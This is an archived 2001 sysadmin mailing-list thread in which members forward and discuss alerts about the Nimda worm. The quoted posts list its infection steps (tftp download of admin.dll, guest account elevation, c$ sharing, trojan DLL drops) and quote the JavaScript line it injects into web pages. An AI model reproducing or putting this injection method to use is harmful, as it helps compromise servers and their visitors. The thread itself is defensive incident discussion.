RE: FW: Worm probes
Title: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes Here's one from a thread on nanog HTH, Geoff - Original Message - From: Jim Olsen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as Code Blue were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code to infect Windows 9x/ME/NT/2k boxes. During the initial infection of a server, the worm does the following: - download a file named admin.dll via tftp from the system that is trying to infect the target - add the guest account to the local administrators group and activates the account - makes sure c$ is shared out - copies itself to c, d, and e drives - tries to mail itself to email addresses that it discovers on the server - creates a file named readme.exe, which is used in the mobile code inserted on the web sites below - add this string to the web pages found on the server: htmlscript language=JavaScriptwindow.open(readme.eml, null, resizable=no,top=6000,left=6000)/script/html - scans for and infects other vulnerable IIS servers - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above readme.exe format (win2000 only) If a user views a web site that is hosted on an infected server, the following happens: - upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention) - the user's machine becomes infected with W32.nimda at this point and time - the worm starts scanning for other vulnerable IIS servers - the worm emails itself to everyone on the user's address book - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogjan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above readme.exe format (win2000 only) It us unknown to me what happens (at this point in time) if a user opens an attachment that is sent from an infected site. It is possible that it could automatically infect the user's computer using the same methods mentioned above. EVERYONE who uses internet explorer to browse the internet should probably do one of two things to stop from being automatically infected by W32.nimda (i have not tested whether or not turning off javascript fixes the problem): o) don't browse web pages until microsoft releases a patch o) turn OFF javascript EVERYONE who uses outlook/outlook express should, at the very least, not open any attachments that they are not expecting. Turning off auto-preview
RE: FW: Worm probes
Title: RE: FW: Worm probes reg hack to not execute perhaps? -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. I am not so sure thatthis assessment is entirely correct. For example, in my situation, I have a PC with Outlook2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not Iwish to save the file to disk - the README.EXE file that is.I just click cancel and then delete the email. I do not contract the virus. John Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes Here's one from a thread on nanog HTH, Geoff - Original Message - From: "Jim Olsen" [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code to infect Windows 9x/ME/NT/2k boxes. During the initial infection of a server, the worm does the following: - download a file named "admin.dll" via tftp from the system that is trying to infect the target - add the guest account to the local administrators group and activates the account - makes sure c$ is shared out - copies itself to c, d, and e drives - tries to mail itself to email addresses that it discovers on the server - creates a file named readme.exe, which is used in the mobile code inserted on the web sites below - add this string to the web pages found on the server: htmlscript language="JavaScript"window.open("readme.eml", null, "resizable=no,top=6000,left=6000")/script/html - scans for and infects other vulnerable IIS servers - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only) If a user views a web site that is hosted on an infected server, the following happens: - upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention) - the user's machine becomes infected with W32.nimda at this point and time - the worm starts scanning for other vulnerable IIS servers - the worm emails itself to everyone on the us
RE: FW: Worm probes
Title: RE: FW: Worm probes Name: Nimda Alias: W32/Nimda Virus Categories: WORM (E-MAIL) Virus Families: W32 GROUP Repairable: Yes Date of Appearance: 09/18/2001 Included in the "Wild List": No Activation Condition Basic Information: W32/Nimda is a worm that spreads by e-mail and exploits a vulnerability in Windows98 and Windows2000 that makes it possible to run Audio/X-wav files through Windows Explorer. To ensure its propagation, this worm sends out a message that includes an attachment with the following name: README.EXE. This file pretends to be an Audio/Xwav file coded in Base64 format. After being decoded, the executable file that contains the worm is 57344 bytes long. One of the actions carried out by this worm consists of sharing the drive C: of the affected computer in order to spread to other network drives. Means of Propagation This worm uses e-mail to spread to other systems. To do this it sends out messages containing an attachment with the following name: README.EXE. Symptoms of Infection This worm creates several files in the Windows temporary directory. Although the content of these files is basically very similar to the original file, it does present certain variations. Additionally, it creates a file called Wininit.ini in the Windows directory. The worm is coded to download a file called Admin.dll. To do this it uses an application called Tftp.exe. Finally, the worm creates a new user through which it shares the C drive and attempts to spread to other network drives. Additionally, it exploits a vulnerability in Windows98 and Windows2000 that makes it possible to run Audio/X-wav files through Windows Explorer. -Original Message-From: Ray Zorz Sent: Tuesday, September 18, 2001 12:58 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes reg hack to not execute perhaps? -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. I am not so sure thatthis assessment is entirely correct. For example, in my situation, I have a PC with Outlook2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not Iwish to save the file to disk - the README.EXE file that is.I just click cancel and then delete the email. I do not contract the virus. John Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes Here's one from a thread on nanog HTH, Geoff - Original Message - From: "Jim Olsen" [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code
RE: FW: Worm probes
Title: RE: FW: Worm probes -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: Worm probes From Panda (note they won't have a sig file for a few hours yet): Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed. I am not so sure thatthis assessment is entirely correct. For example, in my situation, I have a PC with Outlook2000 and preview mode enabled. What I get is that when I click on the email a dialog box opens and prompts whether or not Iwish to save the file to disk - the README.EXE file that is.I just click cancel and then delete the email. I do not contract the virus. John Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: Worm probes Here's one from a thread on nanog HTH, Geoff - Original Message - From: "Jim Olsen" [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 11:03 AM Subject: Re: FW: Worm probes This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code to infect Windows 9x/ME/NT/2k boxes. During the initial infection of a server, the worm does the following: - download a file named "admin.dll" via tftp from the system that is trying to infect the target - add the guest account to the local administrators group and activates the account - makes sure c$ is shared out - copies itself to c, d, and e drives - tries to mail itself to email addresses that it discovers on the server - creates a file named readme.exe, which is used in the mobile code inserted on the web sites below - add this string to the web pages found on the server: htmlscript language="JavaScript"window.open("readme.eml", null, "resizable=no,top=6000,left=6000")/script/html - scans for and infects other vulnerable IIS servers - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only) If a user views a web site that is hosted on an infected server, the following happens: - upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention) - the user's machine becomes infected with W32.nimda at this point and time - the worm starts scanning for other vulnerable IIS servers - the worm emails itself to everyone on the user's address book - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogjan dll version of W32.nimda that is meant t